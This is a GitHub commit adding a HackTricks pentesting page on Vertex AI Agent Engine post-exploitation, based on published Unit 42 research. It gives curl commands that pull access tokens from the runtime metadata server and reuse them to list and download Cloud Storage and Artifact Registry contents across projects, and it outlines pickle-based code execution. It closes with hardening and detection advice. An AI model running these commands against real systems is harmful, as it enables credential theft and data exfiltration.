Skip to content

Commit cccacb7

Browse files
authored
Merge pull request #271 from HackTricks-wiki/update_Double_Agents__Exposing_Security_Blind_Spots_in_GC_20260331_131528
Double Agents Exposing Security Blind Spots in GCP Vertex AI
2 parents 941e8d6 + 6b2c22a commit cccacb7

File tree

5 files changed

+324
-2
lines changed

5 files changed

+324
-2
lines changed

src/SUMMARY.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -104,6 +104,7 @@
104104
- [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md)
105105
- [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md)
106106
- [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md)
107+
- [GCP - Vertex AI Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md)
107108
- [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md)
108109
- [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md)
109110
- [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md)
Lines changed: 297 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,297 @@
1+
# GCP - Vertex AI Post Exploitation
2+
3+
{{#include ../../../banners/hacktricks-training.md}}
4+
5+
## Vertex AI Agent Engine / Reasoning Engine
6+
7+
This page focuses on **Vertex AI Agent Engine / Reasoning Engine** workloads that run attacker-controlled tools or code inside a Google-managed runtime.
8+
9+
For the general Vertex AI overview check:
10+
11+
{{#ref}}
12+
../gcp-services/gcp-vertex-ai-enum.md
13+
{{#endref}}
14+
15+
For classic Vertex AI privesc paths using custom jobs, models, and endpoints check:
16+
17+
{{#ref}}
18+
../gcp-privilege-escalation/gcp-vertex-ai-privesc.md
19+
{{#endref}}
20+
21+
### Why this service is special
22+
23+
Agent Engine introduces a useful but dangerous pattern: **developer-supplied code running inside a managed Google runtime with a Google-managed identity**.
24+
25+
The interesting trust boundaries are:
26+
27+
- **Consumer project**: your project and your data.
28+
- **Producer project**: Google-managed project operating the backend service.
29+
- **Tenant project**: Google-managed project dedicated to the deployed agent instance.
30+
31+
According to Google's Vertex AI IAM documentation, Vertex AI resources can use **Vertex AI service agents** as resource identities, and those service agents can have **read-only access to all Cloud Storage resources and BigQuery data in the project** by default. If code running inside Agent Engine can steal the runtime credentials, that default access becomes immediately interesting.
32+
33+
### Main abuse path
34+
35+
1. Deploy or modify an agent so attacker-controlled tool code executes inside the managed runtime.
36+
2. Query the **metadata server** to recover project identity, service account identity, OAuth scopes, and access tokens.
37+
3. Reuse the stolen token as the **Vertex AI Reasoning Engine P4SA / service agent**.
38+
4. Pivot into the **consumer project** and read project-wide storage data allowed by the service agent.
39+
5. Pivot into the **producer** and **tenant** environments reachable by the same identity.
40+
6. Enumerate internal Artifact Registry packages and extract tenant deployment artifacts such as `Dockerfile.zip`, `requirements.txt`, and `code.pkl`.
41+
42+
This is not just a "run code in your own agent" issue. The key problem is the combination of:
43+
44+
- **metadata-accessible credentials**
45+
- **broad default service-agent privileges**
46+
- **wide OAuth scopes**
47+
- **multi-project trust boundaries hidden behind one managed service**
48+
49+
## Enumeration
50+
51+
### Identify Agent Engine resources
52+
53+
The resource name format used by Agent Engine is:
54+
55+
```text
56+
projects/<project-id>/locations/<location>/reasoningEngines/<reasoning-engine-id>
57+
```
58+
59+
If you have a token with Vertex AI access, enumerate the Reasoning Engine API directly:
60+
61+
```bash
62+
PROJECT_ID=<project-id>
63+
LOCATION=<location>
64+
65+
curl -s \
66+
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
67+
"https://${LOCATION}-aiplatform.googleapis.com/v1/projects/${PROJECT_ID}/locations/${LOCATION}/reasoningEngines"
68+
```
69+
70+
Check deployment logs because they can leak **internal producer Artifact Registry paths** used during packaging or runtime startup:
71+
72+
```bash
73+
gcloud logging read \
74+
'textPayload:("pkg.dev" OR "reasoning-engine") OR jsonPayload:("pkg.dev" OR "reasoning-engine")' \
75+
--project <project-id> \
76+
--limit 50 \
77+
--format json
78+
```
79+
80+
The Unit 42 research observed internal paths such as:
81+
82+
```text
83+
us-docker.pkg.dev/cloud-aiplatform-private/reasoning-engine
84+
us-docker.pkg.dev/cloud-aiplatform-private/llm-extension/reasoning-engine-py310:prod
85+
```
86+
87+
## Metadata credential theft from the runtime
88+
89+
If you can execute code inside the agent runtime, first query the metadata service:
90+
91+
```bash
92+
curl -H 'Metadata-Flavor: Google' \
93+
'http://metadata.google.internal/computeMetadata/v1/instance/?recursive=true'
94+
```
95+
96+
Interesting fields include:
97+
98+
- project identifiers
99+
- the attached service account / service agent
100+
- OAuth scopes available to the runtime
101+
102+
Then request a token for the attached identity:
103+
104+
```bash
105+
curl -H 'Metadata-Flavor: Google' \
106+
'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'
107+
```
108+
109+
Validate the token and inspect the granted scopes:
110+
111+
```bash
112+
TOKEN="$(curl -s -H 'Metadata-Flavor: Google' \
113+
'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' | jq -r .access_token)"
114+
115+
curl -s \
116+
-H 'Content-Type: application/x-www-form-urlencoded' \
117+
-d "access_token=${TOKEN}" \
118+
https://www.googleapis.com/oauth2/v1/tokeninfo
119+
```
120+
121+
> [!WARNING]
122+
> Google changed parts of the ADK deployment workflow after the research was reported, so exact old deployment snippets might no longer match the current SDK. The important primitive is still the same: **if attacker-controlled code executes inside the Agent Engine runtime, metadata-derived credentials become reachable unless additional controls block that path**.
123+
124+
## Consumer-project pivot: service-agent data theft
125+
126+
Once the runtime token is stolen, test the effective access of the service agent against the consumer project.
127+
128+
The documented risky default capability is broad **read access to project data**. The Unit 42 research specifically validated:
129+
130+
- `storage.buckets.get`
131+
- `storage.buckets.list`
132+
- `storage.objects.get`
133+
- `storage.objects.list`
134+
135+
Practical validation with the stolen token:
136+
137+
```bash
138+
curl -s \
139+
-H "Authorization: Bearer ${TOKEN}" \
140+
"https://storage.googleapis.com/storage/v1/b?project=<project-id>"
141+
142+
curl -s \
143+
-H "Authorization: Bearer ${TOKEN}" \
144+
"https://storage.googleapis.com/storage/v1/b/<bucket-name>/o"
145+
146+
curl -s \
147+
-H "Authorization: Bearer ${TOKEN}" \
148+
"https://storage.googleapis.com/storage/v1/b/<bucket-name>/o/<url-encoded-object>?alt=media"
149+
```
150+
151+
This turns a compromised or malicious agent into a **project-wide storage exfiltration primitive**.
152+
153+
## Producer-project pivot: internal Artifact Registry access
154+
155+
The same stolen identity may also work against **Google-managed producer resources**.
156+
157+
Start by testing the internal repository URIs recovered from logs. Then enumerate packages with the Artifact Registry API:
158+
159+
```python
160+
packages_request = artifactregistry_service.projects().locations().repositories().packages().list(
161+
parent=f"projects/{project_id}/locations/{location_id}/repositories/llm-extension"
162+
)
163+
packages_response = packages_request.execute()
164+
packages = packages_response.get("packages", [])
165+
```
166+
167+
If you only have a raw bearer token, call the REST API directly:
168+
169+
```bash
170+
curl -s \
171+
-H "Authorization: Bearer ${TOKEN}" \
172+
"https://artifactregistry.googleapis.com/v1/projects/<producer-project>/locations/<location>/repositories/llm-extension/packages"
173+
```
174+
175+
This is valuable even if write access is blocked because it exposes:
176+
177+
- internal image names
178+
- deprecated images
179+
- supply-chain structure
180+
- package/version inventory for follow-on research
181+
182+
For more Artifact Registry background check:
183+
184+
{{#ref}}
185+
../gcp-services/gcp-artifact-registry-enum.md
186+
{{#endref}}
187+
188+
## Tenant-project pivot: deployment artifact retrieval
189+
190+
Reasoning Engine deployments also leave interesting artifacts in a **tenant project** controlled by Google for that instance.
191+
192+
The Unit 42 research found:
193+
194+
- `Dockerfile.zip`
195+
- `code.pkl`
196+
- `requirements.txt`
197+
198+
Use the stolen token to enumerate accessible storage and search for deployment artifacts:
199+
200+
```bash
201+
curl -s \
202+
-H "Authorization: Bearer ${TOKEN}" \
203+
"https://storage.googleapis.com/storage/v1/b?project=<tenant-project>"
204+
```
205+
206+
Artifacts from the tenant project can reveal:
207+
208+
- internal bucket names
209+
- internal image references
210+
- packaging assumptions
211+
- dependency lists
212+
- serialized agent code
213+
214+
The blog also observed an internal reference like:
215+
216+
```text
217+
gs://reasoning-engine-restricted/versioned_py/Dockerfile.zip
218+
```
219+
220+
Even when the referenced restricted bucket is not readable, those leaked paths help map internal infrastructure.
221+
222+
## `code.pkl` and conditional RCE
223+
224+
If the deployment pipeline stores executable agent state in **Python `pickle`** format, treat it as a high-risk target.
225+
226+
The immediate issue is **confidentiality**:
227+
228+
- offline deserialization can expose code structure
229+
- the package format leaks implementation details
230+
231+
The bigger issue is **conditional RCE**:
232+
233+
- if an attacker can tamper with the serialized artifact before service-side deserialization
234+
- and the pipeline later loads that pickle
235+
- arbitrary code execution becomes possible inside the managed runtime
236+
237+
This is not a standalone exploit by itself. It is a **dangerous deserialization sink** that becomes critical when combined with any artifact write or supply-chain tampering primitive.
238+
239+
## OAuth scopes and Workspace blast radius
240+
241+
The metadata response also exposes the **OAuth scopes** attached to the runtime.
242+
243+
If those scopes are broader than the minimum required, a stolen token may become useful against more than GCP APIs. IAM still decides whether the identity is authorized, but broad scopes increase blast radius and make later misconfigurations more dangerous.
244+
245+
If you find Workspace-related scopes, cross-check whether the compromised identity also has a path to Workspace impersonation or delegated access:
246+
247+
{{#ref}}
248+
../gcp-to-workspace-pivoting/README.md
249+
{{#endref}}
250+
251+
## Hardening / detection
252+
253+
### Prefer a custom service account over the default managed identity
254+
255+
Current Agent Engine documentation supports setting a **custom service account** for the deployed agent. That is the cleanest way to reduce blast radius:
256+
257+
- remove dependence on the default broad service agent
258+
- grant only the minimal permissions required by the agent
259+
- make the runtime identity auditable and intentionally scoped
260+
261+
### Validate the actual service-agent access
262+
263+
Inspect the effective access of the Vertex AI service agent in every project where Agent Engine is used:
264+
265+
```bash
266+
gcloud projects get-iam-policy <project-id> \
267+
--format json | jq '
268+
.bindings[]
269+
| select(any(.members[]?; contains("gcp-sa-aiplatform") or contains("aiplatform-re")))
270+
'
271+
```
272+
273+
Focus on whether the attached identity can read:
274+
275+
- all GCS buckets
276+
- BigQuery datasets
277+
- Artifact Registry repositories
278+
- secrets or internal registries reachable from build/deployment workflows
279+
280+
### Treat agent code as privileged code execution
281+
282+
Any tool/function executed by the agent should be reviewed as if it were code running on a VM with metadata access. In practice this means:
283+
284+
- review agent tools for direct HTTP access to metadata endpoints
285+
- review logs for references to internal `pkg.dev` repositories and tenant buckets
286+
- review any packaging path that stores executable state as `pickle`
287+
288+
## References
289+
290+
- [Double Agents: Exposing Security Blind Spots in GCP Vertex AI](https://unit42.paloaltonetworks.com/double-agents-vertex-ai/)
291+
- [Deploy an agent - Vertex AI Agent Engine](https://docs.cloud.google.com/agent-builder/agent-engine/deploy)
292+
- [Vertex AI access control with IAM](https://docs.cloud.google.com/vertex-ai/docs/general/access-control)
293+
- [Service accounts and service agents](https://docs.cloud.google.com/iam/docs/service-account-types#service-agents)
294+
- [Authorization for Google Cloud APIs](https://docs.cloud.google.com/docs/authentication#authorization-gcp)
295+
- [pickle - Python object serialization](https://docs.python.org/3/library/pickle.html)
296+
297+
{{#include ../../../banners/hacktricks-training.md}}

src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -39,6 +39,12 @@ gcloud iam roles create <ROLE_ID> \
3939

4040
An attacker with the mentioned permissions will be able to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours.
4141

42+
For a **resource-driven** variant where attacker-controlled code steals a **managed Vertex AI Agent Engine runtime token** from the metadata service and reuses it as the Vertex AI service agent, check:
43+
44+
{{#ref}}
45+
../gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md
46+
{{#endref}}
47+
4248
```bash
4349
gcloud --impersonate-service-account="${victim}@${PROJECT_ID}.iam.gserviceaccount.com" \
4450
auth print-access-token
@@ -158,5 +164,3 @@ You can find an example on how to create and OpenID token behalf a service accou
158164

159165
{{#include ../../../banners/hacktricks-training.md}}
160166

161-
162-

src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-vertex-ai-privesc.md

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -10,6 +10,12 @@ For more information about Vertex AI check:
1010
../gcp-services/gcp-vertex-ai-enum.md
1111
{{#endref}}
1212

13+
For **Agent Engine / Reasoning Engine** post-exploitation paths using the runtime metadata service, the default Vertex AI service agent, and cross-project pivoting into consumer / producer / tenant resources, check:
14+
15+
{{#ref}}
16+
../gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md
17+
{{#endref}}
18+
1319
### `aiplatform.customJobs.create`, `iam.serviceAccounts.actAs`
1420

1521
With the `aiplatform.customJobs.create` permission and `iam.serviceAccounts.actAs` on a target service account, an attacker can **execute arbitrary code with elevated privileges**.

src/pentesting-cloud/gcp-security/gcp-services/gcp-vertex-ai-enum.md

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -12,6 +12,14 @@
1212
- **Access pre-trained models** from Model Garden
1313
- **Monitor and optimize** model performance
1414

15+
### Agent Engine / Reasoning Engine
16+
17+
For **Agent Engine / Reasoning Engine** specific enumeration and post-exploitation paths involving **metadata credential theft**, **P4SA abuse**, and **producer/tenant project pivoting**, check:
18+
19+
{{#ref}}
20+
../gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md
21+
{{#endref}}
22+
1523
### Key Components
1624

1725
#### Models
@@ -263,6 +271,12 @@ In the following page, you can check how to **abuse Vertex AI permissions to esc
263271
../gcp-privilege-escalation/gcp-vertex-ai-privesc.md
264272
{{#endref}}
265273

274+
### Post Exploitation
275+
276+
{{#ref}}
277+
../gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md
278+
{{#endref}}
279+
266280
## References
267281

268282
- [https://cloud.google.com/vertex-ai/docs](https://cloud.google.com/vertex-ai/docs)

0 commit comments

Comments
 (0)